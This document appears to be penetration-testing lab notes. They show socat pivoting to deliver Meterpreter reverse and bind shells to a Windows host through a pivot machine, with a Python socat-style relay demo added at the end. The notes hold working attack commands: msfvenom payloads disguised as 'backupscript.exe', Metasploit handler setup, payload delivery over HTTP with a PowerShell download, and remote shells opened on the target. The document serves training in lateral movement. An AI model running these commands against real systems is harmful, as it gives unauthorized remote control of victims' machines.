Socat

Socat Reverse Shell Redirection

Configure Socat on the Pivot Host

On the pivot host, listens on TCP port 8080 and forwards every incoming connection to the attack host (10.10.14.18) on port 80, where the Metasploit handler will listen. The fork option makes socat handle each accepted connection in a child process, so the listener stays up for more than one session.

C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80

Create a Meterpreter Payload

Generates a Windows x64 reverse HTTPS payload that calls back to the pivot host’s internal IP (172.16.5.129) on port 8080, the socat listener, rather than to the attack host directly. The Windows target only needs to reach the pivot host.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 743 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

Configure the Metasploit Listener

Selects the multi-handler module to catch the reverse connection.

C:\mrci0x1> use exploit/multi/handler

Sets the payload type for the reverse HTTPS connection.

C:\mrci0x1> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https

Binds the listener on all interfaces (0.0.0.0) so it accepts the connection socat forwards from the pivot host.

C:\mrci0x1> set lhost 0.0.0.0
lhost => 0.0.0.0

Sets the listener port to 80, the port socat forwards to on the attack host. This must match the TCP4:10.10.14.18:80 side of the socat command, not the payload’s LPORT.

C:\mrci0x1> set lport 80
lport => 80

Starts the listener to wait for the reverse connection.

C:\mrci0x1> run
[*] Started HTTPS reverse handler on https://0.0.0.0:80

Transfer the Payload to the Windows Host

Copies the payload to the pivot host (10.129.202.64) over SSH with scp.

C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/

Serves the payload from the pivot host with Python’s built-in HTTP server on port 8123.

C:\pivot_host> python3 -m http.server 8123

Downloads the payload from the pivot host’s internal interface (172.16.5.129) to the Windows target with PowerShell.

C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Receive the Meterpreter Shell

Once backupscript.exe runs on the target, the handler reports the connection as coming from 10.129.202.64, the pivot host’s external address, because socat opens the connection to the attack host on the target’s behalf; the Windows target never talks to 10.10.14.18 directly. The UUID warnings only mean msfconsole is running without a database and can be ignored here.

[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Staging x64 payload (201308 bytes) ...
[!] https://0.0.0.0:80 handling request from 10.129.202.64; (UUID: 8hwcvdrp) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (10.10.14.18:80 -> 127.0.0.1 ) at 2022-03-07 11:08:10 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor

Socat Bind Shell Redirection

Create a Bind Shell Payload

Generates a Windows x64 bind TCP payload that listens on port 8443 on the target. With a bind shell the target waits for the connection, so no LHOST is needed; the handler will connect in through socat instead.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/bind_tcp -f exe -o backupscript.exe LPORT=8443
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 499 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

Transfer the Payload to the Windows Host

Copies the payload to the pivot host for distribution.

C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/

Hosts the payload on the pivot host using an HTTP server.

C:\pivot_host> python3 -m http.server 8123

Downloads the payload from the pivot host to the Windows target.

C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Configure Socat on the Pivot Host

Listens on port 8080 and forwards each incoming connection to the Windows target’s bind shell at 172.16.5.19:8443, an address the attack host cannot reach directly.

C:\pivot_host> socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

Configure the Metasploit Bind Handler

Selects the multi-handler module for the bind shell connection.

C:\mrci0x1> use exploit/multi/handler

Sets the payload type for the bind TCP connection.

C:\mrci0x1> set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp

Sets RHOST to the pivot host’s external IP, since the handler connects to the socat listener there, not to the Windows target.

C:\mrci0x1> set RHOST 10.129.202.64
RHOST => 10.129.202.64

Sets LPORT to 8080 to match the socat listener. For bind_tcp, LPORT is the port the handler connects to, so it is the socat port on the pivot host, not the payload’s 8443.

C:\mrci0x1> set LPORT 8080
LPORT => 8080

Starts the bind handler to connect to the Socat listener.

C:\mrci0x1> run
[*] Started bind TCP handler against 10.129.202.64:8080

Establish the Meterpreter Session

Metasploit connects to the pivot host on 8080, socat relays the connection to 172.16.5.19:8443, and the stage is sent through that path. As in the reverse case, the session shows the pivot host’s address rather than the Windows target’s.

[*] Sending stage (200262 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:46253 -> 10.129.202.64:8080 ) at 2022-03-07 12:44:44 -0500
meterpreter > getuid
Server username: INLANEFREIGHT\victor
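Both procedures above depend on the same behaviour from socat: a listener that accepts on one port and, for every client, opens a fresh outbound connection to a fixed target (TCP4-LISTEN:8080,fork TCP4:host:port). The Python below is an added example written for this page, not code from the original page, from socat or from Metasploit. It implements that relay and a constructed echo server that stands in for the handler, and it shows why the handler logs the relay’s own address (the pivot host in the real setup, 127.0.0.1 here) as the peer instead of the Windows target’s. The names Relay, pump, start_echo_server and run_demo, and the sample traffic, are this example’s own.

```python
import socket
import threading

BUFSIZE = 4096


def pump(src, dst):
    """Copy src -> dst until EOF, then half-close dst so the other direction can drain."""
    try:
        while data := src.recv(BUFSIZE):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class Relay:
    """Stand-in for `socat TCP4-LISTEN:<lport>,fork TCP4:<rhost>:<rport>` (example code)."""

    def __init__(self, target, listen_host="127.0.0.1", listen_port=0):
        self.target = target            # every accepted connection is forwarded here
        self.upstream_addrs = []        # (ip, port) the relay itself used for each outbound leg
        self.lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.lsock.bind((listen_host, listen_port))
        self.lsock.listen(16)
        self.listen_port = self.lsock.getsockname()[1]
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def stop(self):
        self.lsock.close()              # makes accept() fail, ending the loop

    def _accept_loop(self):
        while True:
            try:
                client, _ = self.lsock.accept()
            except OSError:
                return
            # socat's `fork`: one handler per connection, so the listener keeps serving.
            threading.Thread(target=self._handle, args=(client,), daemon=True).start()

    def _handle(self, client):
        try:
            upstream = socket.create_connection(self.target, timeout=5)
        except OSError:
            client.close()              # target unreachable: drop the client
            return
        upstream.settimeout(None)
        self.upstream_addrs.append(upstream.getsockname())
        threading.Thread(target=pump, args=(upstream, client), daemon=True).start()
        pump(client, upstream)


def start_echo_server():
    """Constructed stand-in for the handler: records each peer address and echoes input."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)
    seen = []

    def serve():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:
                return
            seen.append(peer)
            threading.Thread(target=pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1], seen


def run_demo(connections=2):
    """Push `connections` simultaneous clients through the relay; report echoes and peers."""
    srv, srv_port, seen = start_echo_server()
    relay = Relay(("127.0.0.1", srv_port))
    clients = [socket.create_connection(("127.0.0.1", relay.listen_port), timeout=5)
               for _ in range(connections)]
    results = []
    for i, c in enumerate(clients):
        msg = f"stage request {i}\n".encode()   # constructed sample traffic
        c.sendall(msg)
        c.shutdown(socket.SHUT_WR)
        echoed = b""
        while chunk := c.recv(BUFSIZE):
            echoed += chunk
        results.append((msg, echoed))
        c.close()
    relay.stop()
    srv.close()
    # The handler never sees the clients' addresses, only the relay's own outbound ones.
    return {"roundtrips": results,
            "handler_saw": sorted(seen),
            "relay_used": sorted(relay.upstream_addrs)}
```

run_demo() opens two clients before either sends anything, which is exactly the case where socat without fork would stall: the first connection would be served and the second never accepted. The returned handler_saw and relay_used lists are equal, which is the loopback version of the "handling request from 10.129.202.64" lines in the handler output above: the attack host only ever sees the relay.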
